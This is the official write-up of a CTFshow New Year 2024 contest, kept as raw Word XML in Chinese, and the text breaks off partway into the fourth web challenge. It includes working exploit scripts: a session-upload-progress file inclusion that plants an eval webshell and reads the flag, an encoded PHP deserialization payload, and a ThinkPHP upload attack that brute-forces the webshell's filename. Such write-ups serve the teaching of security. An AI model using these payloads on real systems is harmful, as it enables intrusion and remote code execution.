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CTFshow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>元旦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>水友赛官方wp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比赛概述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比赛形式为个人赛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比赛时间为48小时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开始时间2023年12月31日上午10时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结束时间2024年01月02日上午10时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比赛平台为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://ctf.show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比赛奖励为现金2866元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详情看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://www.bilibili.com/read/cv28223352/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WEB部分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web1 easy_include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easy_include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h1xa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100分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解析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&lt;?php</w:t>
              <w:br/>
              <w:br/>
              <w:t>function waf($path){</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $path = str_replace(".","",$path);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return preg_match("/^[a-z]+/",$path);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>if(waf($_POST[1])){</w:t>
              <w:br/>
              <w:t xml:space="preserve">    include "file://".$_POST[1];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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，发现自动开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>文件包含，这里不需要竞争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exp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# Author:ctfshow-h1xa</w:t>
              <w:br/>
              <w:br/>
              <w:t>url = "xxx"</w:t>
              <w:br/>
              <w:br/>
              <w:t>data = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    'PHP_SESSION_UPLOAD_PROGRESS': '&lt;?php eval($_POST[2]);?&gt;',</w:t>
              <w:br/>
              <w:t xml:space="preserve">    '1':'localhost/tmp/sess_ctfshow',</w:t>
              <w:br/>
              <w:t xml:space="preserve">    '2':'system("cat /flag_is_here.txt");'</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:t>file = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    'file': 'ctfshow'</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:t>cookies = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    'PHPSESSID': 'ctfshow'</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>response = requests.post(url=url,data=data,files=file,cookies=cookies)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print(response.text)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其他解法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没过滤点，直接自由飞翔了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web2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> easy_web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easy_web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chu0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200分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解析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[ez_web.pdf]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exp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socket</w:t>
              <w:br/>
              <w:t>import gzip</w:t>
              <w:br/>
              <w:t>from io import BytesIO</w:t>
              <w:br/>
              <w:t># 目标服务器信息</w:t>
              <w:br/>
              <w:t># 这里直接写域名，不要http:// 和 /</w:t>
              <w:br/>
              <w:t>host = "xxx"</w:t>
              <w:br/>
              <w:t>port = 80</w:t>
              <w:br/>
              <w:br/>
              <w:t>replace = "http://" + host + ":" + str(port)</w:t>
              <w:br/>
              <w:t>request = '''</w:t>
              <w:br/>
              <w:t>POST /?%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77=%43%3a%38%3a%22%53%70%6c%53%74%61%63%6b%22%3a%31%37%31%3a%7b%69%3a%36%3b%3a%4f%3a%33%3a%22%63%74%66%22%3a%32%3a%7b%73%3a%32%3a%22%68%31%22%3b%4f%3a%34%3a%22%73%68%6f%77%22%3a%30%3a%7b%7d%73%3a%32%3a%22%68%32%22%3b%61%3a%31%3a%7b%69%3a%30%3b%61%3a%33%3a%7b%69%3a%30%3b%73%3a%30%3a%22%22%3b%69%3a%31%3b%73%3a%30%3a%22%22%3b%69%3a%32%3b%4f%3a%31%30%3a%22%43%68%75%30%5f%77%72%69%74%65%22%3a%33%3a%7b%73%3a%34%3a%22%63%68%75%30%22%3b%73%3a%39%3a%22%78%69%75%78%69%75%78%69%75%22%3b%73%3a%34%3a%22%63%68%75%31%22%3b%52%3a%31%30%3b%73%3a%33%3a%22%63%6d%64%22%3b%4e%3b%7d%7d%7d%7d%7d&amp;name=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8/convert.base64-decode/resource=ctfw&amp;chu0=Y=00X=00N=00z=00Z=00X=00J=000=00&amp;cmd=%73%68%6f%77_source(chr(47).chr(102).chr(108).chr(97).chr(103)); HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: '''+host+'''</w:t>
              <w:br/>
              <w:t>Content-Length: 38</w:t>
              <w:br/>
              <w:t>Cache-Control: max-age=0</w:t>
              <w:br/>
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
              <w:br/>
              <w:t>Origin: '''+replace+'''</w:t>
              <w:br/>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
              <w:br/>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</w:t>
              <w:br/>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
              <w:br/>
              <w:t>Referer: '''+replace+'''/?%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77=%43%3a%38%3a%22%53%70%6c%53%74%61%63%6b%22%3a%31%37%31%3a%7b%69%3a%36%3b%3a%4f%3a%33%3a%22%63%74%66%22%3a%32%3a%7b%73%3a%32%3a%22%68%31%22%3b%4f%3a%34%3a%22%73%68%6f%77%22%3a%30%3a%7b%7d%73%3a%32%3a%22%68%32%22%3b%61%3a%31%3a%7b%69%3a%30%3b%61%3a%33%3a%7b%69%3a%30%3b%73%3a%30%3a%22%22%3b%69%3a%31%3b%73%3a%30%3a%22%22%3b%69%3a%32%3b%4f%3a%31%30%3a%22%43%68%75%30%5f%77%72%69%74%65%22%3a%33%3a%7b%73%3a%34%3a%22%63%68%75%30%22%3b%73%3a%39%3a%22%78%69%75%78%69%75%78%69%75%22%3b%73%3a%34%3a%22%63%68%75%31%22%3b%52%3a%31%30%3b%73%3a%33%3a%22%63%6d%64%22%3b%4e%3b%7d%7d%7d%7d%7d&amp;name=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8/convert.base64-decode/resource=ctfw&amp;chu0=Y=00X=00N=00z=00Z=00X=00J=000=00&amp;cmd=%73%68%6f%77_source(chr(47).chr(102).chr(108).chr(97).chr(103));</w:t>
              <w:br/>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
              <w:br/>
              <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
              <w:br/>
              <w:t>Connection: close</w:t>
              <w:br/>
              <w:br/>
              <w:t>chu0=1&amp;cmd=1&amp;name=1&amp;show%5Bshow.show=1</w:t>
              <w:br/>
              <w:t>'''</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    s.connect((host, port))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    s.sendall(request.encode())</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = s.recv(4096)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    header, content = response.split(b'\r\n\r\n', 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if header.startswith(b'HTTP/1.1 200 OK') and b'Content-Encoding: gzip' in header:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        with gzip.GzipFile(fileobj=BytesIO(content)) as f:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            uncompressed_data = f.read()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            print(uncompressed_data.decode('utf-8'))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(content.decode('utf-8'))</w:t>
              <w:br/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web3 孤注一掷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孤注一掷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h1xa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0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>~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400分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解析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robots.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查看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泄露,下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>www.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>发现 存在文件上传控制器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&lt;?php</w:t>
              <w:br/>
              <w:br/>
              <w:t>namespace app\index\controller;</w:t>
              <w:br/>
              <w:br/>
              <w:t>use think\Controller;</w:t>
              <w:br/>
              <w:t>use think\Request;</w:t>
              <w:br/>
              <w:br/>
              <w:t>class Upload extends Controller</w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    public function image(Request $request)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $file = $request-&gt;file('file');</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if( ! $file ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $this-&gt;error("error.");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$info = $file-&gt;move(ROOT_PATH . 'public' . DS . 'uploads');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    $filename = '/uploads/' . str_replace("\\", "/", $info-&gt;getSaveName());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $this-&gt;success('', null, $filename);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路径确认为了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="fff67a"/>
        </w:rPr>
        <w:t>ROOT_PATH . 'public' . DS . 'uploads'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下面只要确定好文件名，即可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getshell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File.php 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// 文件保存命名规则</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $saveName = $this-&gt;buildSaveName($savename);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$filename = $path . $saveName;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跟进 buildSaveName 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protected function buildSaveName($savename)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // 自动生成文件名</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (true === $savename) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if ($this-&gt;rule instanceof \Closure) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                $savename = call_user_func_array($this-&gt;rule, [$this]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            } else {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                switch ($this-&gt;rule) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    case 'date':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$savename = date('Ymd') . DS . md5(microtime(true));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    break;</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    default:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        //省略</w:t>
              <w:br/>
              <w:t xml:space="preserve">                }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } elseif ('' === $savename || false === $savename) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $savename = $this-&gt;getInfo('name');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if (!strpos($savename, '.'))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$savename .= '.' . pathinfo($this-&gt;getInfo('name'), PATHINFO_EXTENSION);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    return $savename;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漏洞代码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$savename = date('Ymd') . DS . md5(microtime(true));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路径中前半部分年月日可控，后半部分和时间有关，可以碰撞，后面详细讲碰撞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前面的$file 通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>$request-&gt;file('file');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>获得，跟进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/**</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * 获取上传的文件信息</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * @access public</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * @param string|array $name 名称</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * @return null|array|\think\File</w:t>
              <w:br/>
              <w:t xml:space="preserve">     */</w:t>
              <w:br/>
              <w:t xml:space="preserve">    public function file($name = '')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (empty($this-&gt;file)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $this-&gt;file = isset($_FILES) ? $_FILES : [];</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (is_array($name)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            return $this-&gt;file = array_merge($this-&gt;file, $name);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $files = $this-&gt;file;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (!empty($files)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // 处理上传文件</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $array = [];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            foreach ($files as $key =&gt; $file) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                if (is_array($file['name'])) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    //省略</w:t>
              <w:br/>
              <w:t xml:space="preserve">                } else {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    if ($file instanceof File) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        $array[$key] = $file;</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    } else {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        if (empty($file['tmp_name']) || !is_file($file['tmp_name'])) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                            continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">                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$array[$key] = (new File($file['tmp_name']))-&gt;setUploadInfo($file);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//省略</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;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这里设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>$_FILES['file']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public function setUploadInfo($info)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $this-&gt;info = $info;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        return $this;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    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也就是这里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/**</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * 获取上传文件的信息</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * @access public</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * @param  string $name 信息名称</w:t>
              <w:br/>
              <w:t xml:space="preserve">     * @return array|string</w:t>
              <w:br/>
              <w:t xml:space="preserve">     */</w:t>
              <w:br/>
              <w:t xml:space="preserve">    public function getInfo($name = '')</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return isset($this-&gt;info[$name]) ? $this-&gt;info[$name] : $this-&gt;info;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其实拿到的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>$_FILES['file']['name']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再看后缀处理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if (!strpos($savename, '.'))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$savename .= '.' . pathinfo($this-&gt;getInfo('name'), PATHINFO_EXTENSION);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这里只要上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>文件，就获得的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>$_FILES['file']['name']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后缀就是我们自定义的后缀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>php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再看拼接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if (!strpos($savename, '.'))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$savename .= '.' . pathinfo($this-&gt;getInfo('name'), PATHINFO_EXTENSION);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帮我们加了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 后，也就是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date('Ymd') . DS . md5(microtime(true)).php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下面开始爆破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从http的返回头可以看到服务器时间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我们转换后，直接在这个范围内爆破即可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exp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from datetime import datetime</w:t>
              <w:br/>
              <w:t>import subprocess</w:t>
              <w:br/>
              <w:t>import pytz</w:t>
              <w:br/>
              <w:t>import hashlib</w:t>
              <w:br/>
              <w:t># Author:ctfshow-h1xa</w:t>
              <w:br/>
              <w:br/>
              <w:t>url ="http://792724e5-9877-4dfb-9cfe-2f267337ca9d.challenge.ctf.show/"</w:t>
              <w:br/>
              <w:t>scriptDate = ""</w:t>
              <w:br/>
              <w:t>prefix = ""</w:t>
              <w:br/>
              <w:br/>
              <w:t>session = requests.Session()</w:t>
              <w:br/>
              <w:t>headers = {'User-Agent': 'Android'}</w:t>
              <w:br/>
              <w:br/>
              <w:t>def init():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    route="?url="+url</w:t>
              <w:br/>
              <w:t xml:space="preserve">    session.get(url=url+route,headers=headers)</w:t>
              <w:br/>
              <w:br/>
              <w:t>def getPrefix():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    route="index/upload/image"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    file = {"file":("1.php",b"&lt;?php echo 'ctfshow';eval($_POST[1]);?&gt;")}</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = session.post(url=url+route,files=file,headers=headers)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response_date = response.headers['date']</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("正在获取服务器时间：")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print(response_date)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    date_time_obj = datetime.strptime(response_date, "%a, %d %b %Y %H:%M:%S %Z")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    date_time_obj = date_time_obj.replace(tzinfo=pytz.timezone('GMT'))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    date_time_obj_gmt8 = date_time_obj.astimezone(pytz.timezone('Asia/Shanghai'))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("正在转换服务器时间：")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print(date_time_obj_gmt8)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    year = date_time_obj_gmt8.year</w:t>
              <w:br/>
              <w:t xml:space="preserve">    month = date_time_obj_gmt8.month</w:t>
              <w:br/>
              <w:t xml:space="preserve">    day = date_time_obj_gmt8.day</w:t>
              <w:br/>
              <w:t xml:space="preserve">    hour = date_time_obj_gmt8.hour</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minute = date_time_obj_gmt8.minute</w:t>
              <w:br/>
              <w:t xml:space="preserve">    second = date_time_obj_gmt8.second</w:t>
              <w:br/>
              <w:t xml:space="preserve">    global scriptDate,prefix</w:t>
              <w:br/>
              <w:t xml:space="preserve">    scriptDate = str(year)+str(month)+(str("0"+str(day)) if day&lt;10 else str(day))</w:t>
              <w:br/>
              <w:t xml:space="preserve">    seconds = int(date_time_obj_gmt8.timestamp())</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("服务器时间：")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print(seconds)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    code = f'''php -r "echo mktime({hour},{minute},{second},{month},{day},{year});"'''</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("脚本时间：")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    result = subprocess.run(code,shell=True, capture_output=True, text=True)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    script_time=int(result.stdout)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print(script_time)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if seconds == script_time:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("时间碰撞成功，开始爆破毫秒")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        prefix =  seconds</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("错误，服务器时间和脚本时间不一致")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit()</w:t>
              <w:br/>
              <w:br/>
              <w:t>def checkUrl():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    h = open("url.txt","a")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    global scriptDate</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for i in range(1000,9999):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        target = str(prefix)+"."+str(i)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        md5 =string_to_md5(target)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        route = "/uploads/"+scriptDate+"/"+md5+".php"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("正在爆破"+route)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        response = session.get(url=url+route,headers=headers)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if response.status_code == 200:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            print("成功getshell，地址为 "+url+route)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            exit()</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        h.write(route+"\n")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    h.close()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("爆破结束")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return</w:t>
              <w:br/>
              <w:br/>
              <w:t>def string_to_md5(string):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    md5_val = hashlib.md5(string.encode('utf8')).hexdigest()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return md5_val</w:t>
              <w:br/>
              <w:br/>
              <w:t>if __name__ == "__main__":</w:t>
              <w:br/>
              <w:t xml:space="preserve">    init()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    getPrefix()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    checkUrl()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web4  easy_login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easy_login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h1xa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0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>~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400分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解析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是以前题目的补丁版本 ，以前题目出现了fast gc的非预期，这里进行了patch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结果依然还是非预期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题目已经开源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https://gitee.com/ctfshow/easy-login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下面是预期解的思路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主要更新的地方在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userLogger{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public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$username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$password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$filename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 xml:space="preserve">    public function __construct(){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>-&gt;filename = "log.txt_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$this-&gt;username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>-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$this-&gt;password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>";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  <w:shd w:fill="fff67a"/>
              </w:rPr>
              <w:t>$data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= "最后操作时间：".date("Y-m-d H:i:s")." 用户名 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:i w:val="true"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="fff67a"/>
              </w:rPr>
              <w:t>$this-&gt;username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密码 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:i w:val="true"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="fff67a"/>
              </w:rPr>
              <w:t>$this-&gt;password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\n";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  <w:shd w:fill="fff67a"/>
              </w:rPr>
              <w:t>$d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= file_put_contents(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:i w:val="true"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="fff67a"/>
              </w:rPr>
              <w:t>$this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-&gt;filename,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:i w:val="true"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="fff67a"/>
              </w:rPr>
              <w:t>$data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,FILE_APPEND);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public function setLogFileName(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$filename</w:t>
            </w:r>
            <w:r>
              <w:rPr>
